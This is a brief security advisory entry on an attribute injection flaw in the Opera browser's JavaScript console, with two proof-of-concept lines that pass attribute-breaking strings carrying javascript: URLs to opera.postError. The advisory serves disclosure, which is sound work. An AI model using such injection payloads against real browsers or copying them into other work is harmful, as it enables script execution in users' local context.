|
Opera JavaScript Console Attribute Injection Vulnerability
The following proof of concepts were provided: open("file://localhost/console.html","",""); opera.postError("http://\"style=\"background-image:url('javascript:alert(location.href)')\""); open("file://localhost/console.html","",""); opera.postError("file://\"style=\"background-image:url('javascript:alert(location.href)')\"."); Proof of concept demonstrations are available at the following location: http://security.greymagic.com/adv/gm003-op/ |
|
|
Privacy Statement |
